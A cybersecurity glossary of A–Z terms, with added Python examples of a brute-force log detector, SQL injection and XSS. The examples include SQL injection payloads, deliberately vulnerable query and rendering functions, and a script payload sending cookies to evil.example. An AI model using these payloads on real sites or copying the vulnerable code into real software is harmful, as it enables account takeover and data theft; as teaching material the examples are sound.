The Ultimate Cybersecurity Glossary: Key Terms and Definitions
Welcome to ‘Inside Traffic’s’ comprehensive Cybersecurity Glossary. In our ongoing commitment to empower businesses and individuals with the knowledge to navigate the evolving digital landscape, we’ve compiled a robust list of terms, concepts, and definitions that shed light on the vast world of cybersecurity.
With all its innovations and advancements, the digital age has also brought about complex challenges. Cyber threats are an ever-present danger in our interconnected world, making it vital for businesses and individuals to stay informed about cybersecurity principles and best practices. Whether you’re a seasoned IT professional, a business owner, an aspiring student passionate about creating a career in cybersecurity, or someone who uses technology daily, understanding these terms can be invaluable.
Our glossary is designed to be both comprehensive and accessible, serving as a starting point for those new to cybersecurity and as a refresher for experienced professionals. This glossary spans the breadth of cybersecurity knowledge from common threats like ‘Malware’ and ‘Phishing’ to advanced concepts like ‘Advanced Persistent Threat’ and ‘Zero-Day Attack’.
Before delving into the terms, remember that the cybersecurity field is ever-evolving. As threats grow and change, so do our language and understanding. While this glossary provides a snapshot of key terms as of 22 October 2023, we encourage readers to stay updated with the latest advancements in the field. Recognising the dynamic nature of the cybersecurity landscape, we are committed to regularly updating this glossary to reflect the latest terms, trends, and developments. So, while you’ll find a plethora of information here today, be sure to revisit periodically to stay abreast of the most recent additions and revisions.
At Inside Traffic, knowledge is power, and by understanding the terms and concepts in this glossary, you’re taking a proactive step towards safeguarding your digital assets. Let’s dive in and demystify the intricate world of cybersecurity together.
A
- Access control: The process of restricting access to computer systems and networks to authorised individuals.
- Adware: Software that displays unwanted advertisements on a user’s computer.
- Advanced persistent threat (APT): A type of cyberattack in which the attacker gains unauthorised access to a computer system or network and remains undetected for a long period of time.
- Air gapping: The practice of isolating a computer system or network from the internet and other networks in order to protect it from cyberattacks.
- Anomaly detection: A security technique that establishes a baseline of normal behaviour, using statistical methods or machine learning, and flags deviations from that baseline that may indicate a cyberattack.
- Antivirus: Software that prevents, identifies, and removes viruses and other malicious software from your computer.
- Application programming interface (API): A set of rules that define how software components can interact with each other. APIs can be used to expose data and functionality to external developers, but attackers can also exploit them to gain unauthorised access to systems and data.
- Asset management: The process of identifying, tracking, and managing all of the assets in an organisation, including hardware, software, data, and people.
- Attack vector: Any path or technique an attacker uses to reach and compromise a system, such as a phishing email, an exposed network service, or a stolen credential.
- Authentication: The process of verifying the identity of a user, device, or system.
B
- Backdoor: A hidden entrance to a computer system or network that unauthorised individuals can use to gain access.
- Backup: A copy of data that can be used to restore the data if lost or damaged.
- Biometrics: Authentication methods that use a person’s unique physical characteristics, such as fingerprints, facial features, or iris scans.
- Botnet: A network of computers that have been infected with malware and can be controlled by a remote attacker.
- Bring your own device (BYOD): A policy allowing employees to use their personal devices for work purposes. BYOD can introduce security risks, but there are steps that organisations can take to mitigate these risks.
- Brute Force Attack: An attack that systematically tries every possible password, key, or other combination until the correct one is found.
- Bug: An unintended software or hardware problem, ranging from minor glitches to severe issues that render a system inoperable.
- Business continuity planning (BCP): The process of developing a plan to ensure that an organisation can continue to operate in the event of a disruption, such as a cyberattack or natural disaster.
C
- Certificate authority (CA): An organisation that issues digital certificates, which are used to verify the identity of websites and other entities.
- Cipher: A mathematical algorithm used to encrypt and decrypt data.
- Click fraud: Scammers generate revenue using fake clicks, sometimes hiring individuals to click on ads from multiple devices.
- Cloud computing: The delivery of computing services over the internet.
- Cloud security: The practice of protecting data, applications, and infrastructure hosted in the cloud. Cloud computing offers benefits such as scalability and agility, but it also introduces new security risks that cloud security must address.
- Compliance: Ensuring an organisation’s systems and processes meet all applicable regulations. Cybersecurity compliance is important because it helps organisations to protect their customers’ data and avoid costly fines and penalties.
- Containerisation: A virtualisation technology that allows developers to package applications and their dependencies into isolated units called containers. Containers can be deployed on any platform that supports the container runtime, making them ideal for cloud computing and microservices architectures. However, containerisation also introduces new security challenges.
- Cryptography: The practice of protecting information by making it unreadable to unauthorised individuals.
- Cyberattack: An attempt by an attacker to damage, disrupt, or gain unauthorised access to a computer system or the sensitive information it holds.
- Cyber Espionage: The use of computer networks to gain unauthorised access to sensitive information, often for spying, economic gain, or political motivations.
D
- Data breach: The unauthorised access or theft of sensitive data.
- Data loss prevention (DLP): A set of technologies and practices to prevent sensitive data from being lost, stolen, or misused. DLP can be used to monitor and control data movement within and outside of an organisation.
- Dark web: A part of the internet that is not indexed by search engines and is reachable only through special software, such as the Tor browser. The dark web is often used for illegal activities like cybercrime and drug trafficking.
- DDoS (Distributed Denial of Service): A cyberattack that overwhelms services by flooding them with traffic from multiple sources.
- Decryption: Converting coded or encrypted data back into its original form.
- Defence-in-depth: The strategy of using multiple layers of security to ensure backup protection if one layer fails.
- Deepfake: A synthetic media that uses artificial intelligence to create fake videos or audio recordings that are difficult to distinguish from the real thing. Deepfakes can be used maliciously, such as spreading misinformation or blackmailing people.
- Denial-of-service (DoS) attack: An attack that attempts to make a computer system or network unavailable to its intended users.
- Detection Deficit: The time gap between when an attack occurs and when it’s discovered.
- Digital signature: A cryptographic technique used to authenticate the identity of the sender of a message and ensure that the message has not been tampered with.
- Domain: In Windows networking, a group of computers that share account information and security policies, managed centrally by a domain controller.
E
- Encryption: The process of converting data into a format that only authorised individuals can read.
- Endpoint: A physical device, like mobile phones or desktop computers, connected to a computer network.
- Endpoint security: Security measures implemented on individual devices, such as computers, smartphones, and tablets. Endpoint security is important because it protects devices from malware, phishing attacks, and other threats.
- Endpoint Detection and Response (EDR): A solution that continually monitors and counteracts potential threats in endpoint devices.
- Ethical hacking: Using hacking techniques to identify and fix security vulnerabilities in computer systems and networks. Ethical hackers are also known as white hat hackers.
- Evil Twin: A fraudulent Wi-Fi access point mimicking a legitimate Wi-Fi network, allowing attackers to eavesdrop on connected users and collect sensitive data.
F
- Firewall: A network security device that monitors and controls incoming and outgoing network traffic based on predetermined security policies. Firewalls can block malicious traffic and protect internal networks from attack.
- Firmware: Software that is embedded in hardware devices. Firmware updates are important for security because they can patch vulnerabilities in the firmware.
- Fraud: The act of deceiving someone to obtain money or other benefits.
- File Transfer Protocol (FTP): A standard network protocol for transferring files between a client and a server. Plain FTP sends credentials and file contents unencrypted, so secure alternatives such as SFTP or FTPS should be used.
G
- Gateway: A network point that acts as an access point to another network.
- Governance: The set of rules and procedures used to manage a computer system or network. Cybersecurity governance is important because it helps organisations ensure effective cybersecurity policies and procedures.
- Grey Hat Hacker: Someone who sometimes acts legally, sometimes not, but without malicious intent.
- Guessing Entropy: A measure of how many attempts a hacker might need to guess a password or another unknown variable.
H
- Hacker: A person who uses computers to gain unauthorised access to data.
- Hardening: Configuring a computer system or network to enhance its security. This can include steps such as disabling unnecessary services, changing default passwords, and installing security updates.
- Hash function: A mathematical algorithm that converts data of any size into a fixed-size value (a digest or fingerprint). A secure hash function is one-way and makes it infeasible to find two inputs with the same digest; hashes are used for data integrity checks and, combined with a per-password salt and a deliberately slow algorithm, for password storage.
- Honeynet: A decoy network set up to lure attackers and collect information about their activities.
- Honeypot: A decoy system designed to attract cyber attackers, allowing defenders to detect, deflect, or study hacking attempts.
- Human-factor engineering: The practice of designing systems and interfaces to be intuitive, aiming to minimise the risk of human error.
I
- Identity and access management (IAM): A set of processes and technologies to manage user identities and provide access to systems and resources. Ensuring only authorised users have access to sensitive data and systems bolsters security.
- Identity Theft: The fraudulent acquisition and use of another individual’s private identifying information, typically for financial gain.
- Incident response: The methodology of responding to and managing a cybersecurity incident. This includes identifying the scope, containing the damage, eradicating the threat, recovery, and learning from the event.
- Information security (InfoSec): The discipline dedicated to protecting information from unauthorised access, use, disclosure, disruption, modification, or destruction. This encompasses various activities such as cybersecurity, risk management, and compliance.
- Infrastructure as code (IaC): The technique of using code or scripts to define and deploy IT infrastructure, ensuring consistency and repeatability.
- Intrusion Detection System (IDS): A technology or system that observes network traffic for suspicious behaviour and alerts administrators about potential breaches or malicious activity.
- Internet of Things (IoT): Refers to the expansive network of physical devices, vehicles, appliances, and more that connect and exchange data over the internet.
- IP Spoofing: Forging the source address of IP packets so that they appear to come from another host, used to hide the attacker's true origin or to impersonate a trusted system.
- IP Packet: A unit of data that carries the required information for transmitting data between devices over a network.
- IP Address: A unique string of numbers associated with a computer used for identification on a network.
J
- Job rotation: The practice of periodically rotating employees to different jobs in order to reduce the risk of fraud and conspiracy. Job rotation can also be used to reduce the risk of human error in security-sensitive roles.
- Jailbreaking: The process of removing software restrictions from devices, potentially exposing them to vulnerabilities.
K
- Key management: The method of creating, distributing, storing, and utilising cryptographic keys. Effective key management is crucial for ensuring the confidentiality and integrity of encrypted data.
- Keylogger: Surveillance software or malware that records a user’s keystrokes. This can be used maliciously to capture passwords, personal details, or other sensitive information.
- Known Vulnerability Scanner: A specialised tool that probes computer systems and networks for recognised security vulnerabilities, assisting administrators in identifying and rectifying potential weaknesses.
L
- Least privilege: A security principle that advocates granting users only the permissions required to carry out their designated tasks. Minimising the access rights of each user limits the potential damage from security breaches.
- Logic Bomb: A malicious code deliberately inserted into software that gets activated when specific conditions are fulfilled. Such code can result in harmful actions like data corruption or system crashes.
- Log management: The systematic approach of collecting, storing, and scrutinising system logs. This process aids in detecting and investigating unusual or potentially malicious activity.
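The following is an added example, not part of the original glossary, showing the Log management entry above in practice together with the Brute Force Attack entry: a small detector that parses OpenSSH-style authentication log lines and flags a source address with repeated failed logins inside a short window. The log lines are constructed for the example and are not real data; the threshold and window size are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Iterable, List, Optional, Tuple

# Constructed sample log lines in OpenSSH's syslog format (not real data).
SAMPLE_LOG = """\
Oct 22 10:00:01 bastion sshd[4121]: Failed password for invalid user admin from 203.0.113.7 port 51012 ssh2
Oct 22 10:00:03 bastion sshd[4121]: Failed password for invalid user admin from 203.0.113.7 port 51013 ssh2
Oct 22 10:00:04 bastion sshd[4121]: Failed password for root from 203.0.113.7 port 51014 ssh2
Oct 22 10:00:06 bastion sshd[4121]: Failed password for root from 203.0.113.7 port 51015 ssh2
Oct 22 10:00:07 bastion sshd[4121]: Failed password for root from 203.0.113.7 port 51016 ssh2
Oct 22 10:00:30 bastion sshd[4122]: Accepted publickey for alice from 198.51.100.20 port 40022 ssh2
Oct 22 10:05:00 bastion sshd[4123]: Failed password for bob from 198.51.100.20 port 40023 ssh2
Oct 22 10:15:00 bastion sshd[4124]: Failed password for bob from 198.51.100.20 port 40024 ssh2
"""

# Matches both "Failed password for [invalid user] <user>" and "Accepted <method> for <user>".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line: str, year: int = 2023) -> Optional[Tuple[datetime, str, str, str]]:
    """Return (timestamp, result, user, source_ip) or None for lines we do not care about.

    Syslog timestamps carry no year, so one is supplied (assumed 2023 here).
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines: Iterable[str], threshold: int = 5, window_seconds: int = 60) -> List[str]:
    """Flag source IPs that produce at least `threshold` failed logins within any sliding window."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    alerts: List[str] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[1] != "Failed":
            continue
        ts, _, _, ip = parsed
        window = failures[ip]
        window.append(ts)
        # Drop failures that fell out of the window.
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and ip not in alerts:
            alerts.append(ip)
    return alerts


if __name__ == "__main__":
    for ip in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"possible brute force from {ip}")
```

Two slow failures from 198.51.100.20 ten minutes apart stay below the threshold, while five failures in six seconds from 203.0.113.7 raise an alert; a SIEM rule does the same thing at scale across many log sources.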
M
- Malware: Software crafted with the intent to harm or exploit any device, network, service, or software application. Examples of malware include viruses, worms, Trojan horses, ransomware, and spyware.
- Multi-factor authentication (MFA): A security protocol requiring users to verify their identity using multiple methods of authentication. Typically, MFA combines something the user knows (like a password), something the user has (like a mobile device to receive a verification code), and sometimes something the user is (like a fingerprint or facial recognition). By implementing MFA, security is enhanced as it offers a layered defence against unauthorised access.
- Malicious Code: Code intended to harm, expose vulnerabilities, or threaten a system’s security.
N
- Network Security: The set of measures, policies, and practices employed to safeguard computer networks from unauthorised access, attacks, and damage. These protective steps can include the use of firewalls, intrusion detection systems, access control lists, and regular security assessments, among other tools and tactics.
- Network Traffic Visibility: Refers to the capability to monitor, analyse, and gain insights from the data travelling across a network. It provides organisations with a clear understanding of what’s happening on their networks in real-time, helping to detect security threats, troubleshoot issues, and optimise performance. Effective network traffic visibility is essential for proactive threat detection and for ensuring that security tools are working efficiently.
O
- OAuth: An open standard for delegated authorisation, commonly used to let users grant a website or application limited access to their data on another service without sharing their password. OAuth itself covers authorisation rather than authentication; OpenID Connect builds on it to provide authentication.
- Open-source software: Software that is distributed with its source code, allowing anyone to inspect, modify, and enhance the code. The transparency of open-source software can often lead to rapid vulnerability detection and patching by the community.
- Operational security (OpSec): The practice of protecting sensitive information from unauthorised disclosure, ensuring that adversaries or competitors do not gain insight into planned actions or activities.
- Operating System: System software that manages computer resources and processes.
P
- Patch management: The process of installing security patches to fix known vulnerabilities in computer systems and software. Regular patching helps safeguard systems from potential threats that exploit known vulnerabilities.
- Penetration testing: The practice of simulating cyberattacks on computer systems, networks, or applications to identify vulnerabilities that could be exploited by malicious actors. It’s a proactive approach to discovering security flaws before they can be exploited.
- Phishing: A cybercrime in which targets are contacted, typically via email, posing as a legitimate entity to deceive individuals into providing sensitive data, such as passwords, credit card numbers, or personal identification information.
- Programming: The process of instructing a computer to perform tasks by writing code in a language the computer can understand.
Q
- Quantum cryptography: Cryptographic techniques, most notably quantum key distribution (QKD), whose security rests on the laws of quantum mechanics rather than on computational hardness: any attempt to eavesdrop on the key exchange disturbs the quantum states and can be detected. It is distinct from post-quantum cryptography, which uses conventional algorithms designed to resist attack by quantum computers.
R
- Ransomware: A type of malware that encrypts a victim’s data and demands a ransom payment in exchange for the decryption key.
- Risk assessment: The process of identifying, analysing, and evaluating cybersecurity risks. Risk assessments are important for security because they help organisations prioritise their security efforts and make informed decisions about how to allocate their resources.
- Rootkit: A type of malicious software that provides root or privileged access to a computer while concealing its presence.
- Remote Access: Gaining access to a computer or network from a remote location.
S
- Social engineering: A type of cyberattack that relies on human manipulation to trick victims into revealing sensitive information or performing actions that compromise security.
- Security awareness training: Training that teaches employees about cybersecurity risks and how to avoid them. Security awareness training is important for security because it helps to reduce the risk of human error, which is a leading cause of cybersecurity incidents.
- Security information and event management (SIEM): A system that collects and analyses security logs from multiple sources in order to detect and investigate suspicious activity. SIEM systems can help organisations to identify and respond to cybersecurity incidents more quickly and effectively.
- Software development lifecycle (SDLC): The process of planning, building, testing, and deploying software. A secure SDLC includes security activities at every stage, from threat modelling during requirements gathering to security testing before deployment.
- Supply chain security: The practice of protecting information systems and software from vulnerabilities that could be exploited by attackers who gain access to the supply chain. Supply chain security is important because organisations are increasingly reliant on third-party suppliers for software and hardware.
- Spyware: Malware that covertly collects information about a user's activity, such as browsing habits, keystrokes, or files, and transmits it to a third party without the user's consent.
- SQL Injection: An attack in which untrusted input is inserted into a database query without proper handling, allowing an attacker to alter the query's logic and read, modify, or delete data. Parameterised queries are the standard defence.
- Security Policy: Organisational rules and guidelines regarding computer and network security.
- Security Operations Centre (SOC): A centralised team and facility that monitors for, and responds to, security issues and incidents.
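The following is an added example, not part of the original glossary, illustrating the SQL Injection entry above: a login query built by string concatenation beside the parameterised form. It uses Python's built-in sqlite3 module with an in-memory database and constructed rows; the table layout and the placeholder "hash" values are assumptions for the example (a real application would store salted password hashes, not the literal strings used here).

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("alice", "hash-of-alice-password", "admin"),
            ("bob", "hash-of-bob-password", "user"),
        ],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> List[Tuple[str, str]]:
    """Vulnerable: user input is spliced into the SQL text, so it can change the query's grammar."""
    query = (
        f"SELECT username, role FROM users WHERE username = '{username}' "
        f"AND password_hash = '{password_hash}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> List[Tuple[str, str]]:
    """Safe: a parameterised query binds the values, which are never parsed as SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # Comment-style payload: closes the string and discards the password check.
    payload = "alice' --"
    print("vulnerable:", login_vulnerable(conn, payload, "anything"))  # logs in as alice
    print("safe:      ", login_safe(conn, payload, "anything"))        # no match
    # Tautology payload: returns every row.
    print("vulnerable:", login_vulnerable(conn, "x' OR '1'='1", "x' OR '1'='1"))
```

With the vulnerable function the `--` payload turns the password condition into an SQL comment and the `' OR '1'='1` payload makes the WHERE clause true for every row; the parameterised version treats both payloads as ordinary (non-matching) usernames.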
T
- Threat modelling: The process of identifying and analysing potential threats to a computer system or network. Threat modelling can help organisations to develop security controls to mitigate those threats.
- Trojan horse: Malware that disguises itself as a legitimate program in order to trick users into installing it. Once installed, a Trojan horse can give attackers access to the victim's computer or network or deliver further malicious software.
- Two-Factor Authentication (2FA): A security process requiring two forms of identification, typically something known (a password) and something possessed (a smartphone or hardware token).
U
- User Account Control (UAC): A Windows security feature that prompts for consent or administrator credentials before allowing changes to system settings, reducing the risk of users or malware accidentally or maliciously compromising the system.
- URL Filtering: The practice of blocking access to certain websites based on the web address.
V
- Vulnerability: A weakness in a computer system or software that can be exploited by attackers. Vulnerabilities can be caused by software bugs, configuration errors, or physical security weaknesses.
- Virus: A piece of code which is capable of copying itself and typically has a detrimental effect, such as corrupting the system or destroying data.
- VPN (Virtual Private Network): An encrypted tunnel that carries traffic securely across an untrusted network such as the internet, for example between a remote worker's device and a corporate network.
W
- Web application firewall (WAF): A security device that monitors and controls incoming and outgoing web traffic. WAFs can help to protect web applications from attacks such as SQL injection, cross-site scripting, and denial-of-service attacks.
- White hat hacker: A security professional who uses hacking techniques to identify and fix security vulnerabilities in computer systems and networks. White hat hackers are also known as ethical hackers.
- Worm: A standalone malware computer program that replicates itself in order to spread to other computers.
- Whitelisting: Also called allowlisting. Granting permission to explicitly authorised software, users, or addresses while denying all others by default.
X
- XSS (Cross-Site Scripting): An attack in which malicious scripts are injected into a trusted website and executed in the browsers of other users who visit it, allowing theft of session cookies or actions performed on the victim's behalf. The main defence is encoding untrusted data appropriately for the context in which it is output.
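The following is an added example, not part of the original glossary, illustrating the XSS entry above: a comment renderer that concatenates user input into HTML beside one that encodes it, plus a link builder showing that entity encoding alone does not protect a URL attribute. It uses only the Python standard library; the markup fragments and the payload are constructed for the example.

```python
import html
from urllib.parse import urlparse


def render_comment_vulnerable(user_input: str) -> str:
    """Vulnerable: untrusted text is concatenated straight into markup, so tags in it become live HTML."""
    return f'<p class="comment">{user_input}</p>'


def render_comment_safe(user_input: str) -> str:
    """Safe for the HTML text context: <, >, &, " and ' are turned into entities."""
    return f'<p class="comment">{html.escape(user_input, quote=True)}</p>'


def safe_link(url: str, text: str) -> str:
    """URL-attribute context: encoding is not enough, because 'javascript:' contains no
    special characters. The scheme is allow-listed (http/https assumed here) before encoding.
    """
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text, quote=True)}</a>'


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    # Constructed payload that would send the visitor's cookies to an attacker-controlled host.
    payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    print(render_comment_vulnerable(payload))
    print(render_comment_safe(payload))
    print(safe_link("javascript:alert(1)", "click me"))
    print(safe_link("https://example.com/?a=1&b=2", "example"))
```

Encoding is context-specific: what is safe inside element text is not automatically safe inside an attribute, a URL, or a script block, which is why templating engines offer separate escaping rules for each.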
Y
- YARA: A tool used in malware research and detection which allows for the creation of descriptions of malware families based on textual or binary patterns.
Z
- Zero-day attack: An attack that exploits a vulnerability that is unknown to the software vendor. Zero-day attacks are difficult to defend against because no patch is available to fix the vulnerability.
- Z-Wave: Z-Wave is a wireless communication protocol primarily designed for home automation. It allows various smart devices within the home (such as lights, thermostats, door locks, and security sensors) to communicate and be controlled remotely. Z-Wave is designed to be a low-power technology, making it ideal for battery-operated devices. Z-Wave supports strong encryption for secure communication between devices. This is particularly important for devices like smart locks.